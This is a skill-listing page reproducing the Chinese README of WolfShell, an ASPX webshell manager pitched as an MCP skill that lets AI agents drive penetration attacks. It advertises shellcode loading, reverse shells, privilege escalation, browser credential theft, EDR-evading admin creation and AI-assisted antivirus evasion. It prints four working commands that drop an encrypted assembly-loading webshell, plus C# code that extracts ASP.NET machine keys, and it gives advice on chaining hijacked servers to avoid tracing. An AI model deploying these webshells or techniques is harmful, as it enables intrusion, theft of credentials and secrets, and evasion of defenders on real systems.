SkillAgentSearch skills...

Wolfshell

金刚狼:首款支持AI渗透的WebShell MCP,首款支持多层内网级联的ASPX、ASHX高级WebShell管理工具,AES加密通信,无需代理,内存加载渗透工具,无文件落地隐蔽渗透目标,动态代码执行,ShellCode加载(Metasploit/Cobalt Strike),反弹Shell,Socks代理,内存马

Install / Use

/learn @0x7556/Wolfshell
About this skill

Quality Score

0/100

Supported Platforms

Claude Code
Cursor

README

WolfShell

Author WolfShell GitHub issues Github Stars GitHub forks GitHub license

金刚狼:专为ASPX设计的高级WebShell管理工具

金刚狼是一款专为 ASPX 环境设计的高级 WebShell 管理工具,为安全研究人员和渗透测试人员提供强大的命令执行、提权、和内网穿透能力。它集成了大量渗透工具支持内存加载无文件落地操作实现高隐蔽性的内网渗透

🚀 核心优势

  • 支持AI渗透:支持使用自然语言指挥AI操作WebShell执行命令进行渗透。
  • 高效隐蔽的通信: 采用 二进制流 传输协议,确保通信的高效性与隐蔽性。
  • 端到端安全加密: 所有传输 Payload 均经过 AES加密 保护,且每次通信使用 随机密钥,保障数据安全。
  • 无痕运行: 支持直接在 内存中加载并执行代码,最大程度避免在磁盘留下痕迹,显著提升操作隐蔽性和安全性。
  • 内网级联WebShell控制: 通过现有已控的WebShell,无需部署代理或配置端口转发,即可连接控制更深层内网环境中的WebShell。
  • Hacking后渗透:通过已控的 WebShell 在内存中加载渗透工具,无需部署代理或配置端口转发,即可实现便捷高效的内网横向渗透。
  • 语言特征: 服务端(webshell)及payload均为纯英文,只有提供的WebShell变种文件包含英文、日文、韩文。

🔥 功能特性

  • Shell:支持ASPX、ASHX、ASMX、HTTP、TCP、PS1、EXE、DLL,(目前仅开放ASPX、ASHX、内存马3种类型)。
  • 内存马:ASPX一键注入内存马,任意路径访问,每次都可修改shell地址连接,干扰蓝队分析。
  • Cmd命令执行: 在目标系统上直接执行任意 CMD 命令。魔改whoami防止被EDR记录并报警。
  • 文件管理: 在目标系统上枚举目录文件、新建文件、文件上传、EXE执行、重命令、删除、设置文件时间等。
  • PowerShell执行: 支持执行 PowerShell 代码和命令。魔改whoami防止被EDR记录并报警。
  • Shellcode执行: 可在目标环境内直接执行原生的 Shellcode,一键上线Cobalt Strike、Metasploit。
  • .NET程序执行: 支持内存加载执行自定义.NET程序集,快速扩展后渗透能力。
  • 内存加载扫描器: 只需研发单个IP的.NET程序,通过该模块即可变成内存加载的C段扫描器。
  • C#代码执行: 支持动态加载与执行 C# 代码。
  • ValidationKey:提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息。
  • web.config读取:提取数据库连接信息(数据库名、用户、密码)、SMTP/邮件服务器用户密码等。
  • 端口转发: 实现本地端口到远程内网主机的映射,方便安全地访问内部网络服务。
  • HTTP代理: 一键内存注入Suo5高性能 HTTP 隧道代理工具。
  • EfsPotato: 利用系统服务漏洞进行权限提升。
  • BadPotato: 利用系统服务漏洞进行权限提升。
  • 内网级联Cmd命令执行: 支持级联内网第2层 WebShell 执行 CMD 命令进行横向移动。
  • 内网级联PowerShell执行: 支持级联内网第2层 WebShell 执行 PowerShell 命令进行横向移动。
  • SshCmd:SSH 远程命令执行工具,支持对内网主机的命令执行、文件上传下载实现横向移动。
  • MysqlCmd:MySQL 数据库连接工具,支持连接内网MySQL,执行查询、导入导出等数据库操作。
  • MssqlCmd:SQL Server数据库连接工具,支持连接内网数据库,执行查询、导入导出、横向移动、命令执行、Potato提权等。
  • SharpWeb:浏览器凭据抓取工具,支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。
  • 密码读取: IISpwd wifipwd FileZillaPwd firefoxpwd XshellPwd GetPwd FirefoxHistory FirefoxCookie
  • 漏洞检测:MS17010 SMBGhost HikvisionPoc ActivemqPoc Struts2Poc WeblogicPoc CVE-2022-36537 CVE-2024-47176 CVE-2022-27925 CVE-2024-27956
  • 横向工具:wshell SmbExec WmiExec WmiExec2 AtExec MssqlCmd MmcExec ShellExec ShellBrowserExec
  • AI免杀:接入AI人工智能,聊个天就能免杀WebShell。
  • Ladon:内网渗透工具集,内存加载无文件落地,包含端口扫描、资产探测、密码审计、漏洞检测、漏洞利用、横向移动等。(工具在集成中,目前已完成10多种协议资产探测,其它模块暂未支持,和potato一样,无法集成所有工具,有些功能可能得使用原程序)
  • AddUser: 绕过杀软EDR\XDR添加系统用户、管理员、域用户、域管理员工具。
  • NoPowerShell:禁用或没有PowerShell执行PowerShell命令、代码、文件功能。

辅助功能

AI人工智能

  • AI免杀:接入AI人工智能,聊个天就能免杀WebShell。

加密解密

  • 支持加密算法: BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码
  • 支持解密算法: BASE64、HEX、ASCII、PowerShell、URL编码

安装与使用

  1. 下载WolfShell
git clone https://github.com/0x7556/wolfshell.git
  1. 配置环境

    • 确保目标环境支持ASPX、ASHX,并已正确配置。
  2. 上传WolfShell

    • 将WolfShell文件上传到目标服务器,支持ASPX、ASHX、内存马3种类型。
    • WebShell脚本: https://github.com/0x7556/wolfshell/tree/main/shell
  3. 访问WebShell

    • 通过工具客户端连接WebShell,默认密码 WolfShell,修改密码可使用工具上的WolfHash加密。

使用环境

  • 操作系统: Windows
  • .NET 版本: .NET Framework 4.8

命令 | 漏洞 GetShell

具备命令执行条件时,可通过以下4种方法写入 金刚狼 WebShell

PowerShell写入wolf.aspx

powershell -Command "Set-Content -Path 'wolf.aspx' -Value '<%@ Page Language=\"C#\" %><%if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); }%>'"

PowerShell命令 Base64写入wolf.aspx

powershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA==

cmd命令 echo & certutil 写入wolf.aspx

echo 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e > w.hex && certutil -f -decodehex w.hex wolf.aspx && del w.hex

cmd命令 echo 写入wolf.aspx

echo ^<%@ Page Language="C#" %^> > wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx && echo System.IO.Stream s = Request.InputStream; >> wolf.aspx && echo byte[] c = new byte[s.Length]; >> wolf.aspx && echo s.Read(c, 0, c.Length); >> wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx && echo } %^> >> wolf.aspx

功能示例

自定义.NET程序执行

.NET程序执行: 支持内存加载执行自定义.NET程序集,快速扩展后渗透能力。 exeloader

AI人工智能

使用AI兔杀金刚狼 WebShell 服务端 aicode

级联内网第3层WebShell 执行Cmd命令

通过入口点 192.168.50.106 级联内网 192.168.50.159 再次级联下一层内网 192.168.50.69 WebShell 执行命令

PS: 当然也可级联外网,比如抓了一些服务器当跳板,真正要搞的目标在第3层,这样就很难被追踪或溯源到你的真实IP了

CmdShell示例

级联内网第2层WebShell 执行Cmd命令

通过入口点 192.168.50.159 级联内网 192.168.50.106 WebShell执行命令

CmdShell示例

WebShell入口点 执行Cmd命

CmdShell示例

WebShell入口点 执行PowerShell命令/代码

  • whoami代码实现非系统whoami
  • 支持命令执行、代码执行 长度9K
  • 输入info、ver可查看操作系统版本、位数、.NET版本、PowerShell版本信息
  • 输入whoami、username可自动转成对应powershell代码查看用户信息
  • Base64加密代码执行 示例 base64:ZWNobyBXb2xmU2hlbGw=
PS C:\Users\admin>whoami
whoami: IIS APPPOOL\DefaultAppPool
Username: WIN-021V7TK43N5$

PS C:\Users\admin>info
Operating System Version: Microsoft Windows Server 2019 Datacenter 64 bit
Version Number: 10.0.17763

PowerShell Version:
5.1.17763.1

.NET Detailed Versions:
PSChildName Version   Release
----------- -------   -------
Client      4.7.03190  461814

PS C:\Users\admin>base64:ZWNobyBXb2xmU2hlbGw=
WolfShell

PS C:\Users\admin>Write-Host "Current User:`n$env:USERNAME"
Current User:
WIN-021V7TK43N5$

PowerShell示例

文件管理

FileMgr

C#代码执行

获取 ValidationKey 示例代码

  • ValidationKey:提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息

using System;
using System.Reflection;
using System.Web.Configuration;
public class Eval
{
public string eval(Object obj)
{
var sy = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
var cg = (MachineKeySection)gac.Invoke(null, new object[0]);
return "ValidationKey: " + cg.ValidationKey + " | " + "Validation: " + cg.Validation + " | " + "DecryptionKey: " + cg.DecryptionKey + " | " + "Decryption: " + cg.Decryption + " | " + "CompatibilityMode: " + cg.CompatibilityMode;
}
}

C#代码示例

扫描C段存活主机 示例代码


using System;
using System.Net;
using System.Net.NetworkInformation;
using System.Text;
using System.Threading.Tasks;
public class Eval
{
public string eval(Object obj)
{
StringBuilder iplist = new StringBuilder();
string baseIP = "192.168.1.";
PingOptions options = new PingOptions();
options.DontFragment = true;
var tasks = new Task[254];
for (int i = 1; i < 255; i++)
{
int ipSuffix = i;
tasks[i - 1] = Task.Run(() =>
{
using (Ping myPing = new Ping())
{
PingReply reply = myPing.Send(baseIP + ipSuffix, 120);
if (reply.Status == IPStatus.Success)
{
lock (iplist)
{
iplist.AppendLine("Alive IP: " + reply.Address.ToString());
}
}
}
});
}
Task.WaitAll(tasks);
return iplist.ToString();
}
}


C#代码示例

CMD命令执行 示例代码


using System;
using System.Diagnostics;
public class Eval
{
public string eval(Object obj)
{
try
View on GitHub
GitHub Stars185
CategoryDevelopment
Updated5h ago
Forks19

Languages

ASP.NET

Security Score

95/100

Audited on Apr 1, 2026

No findings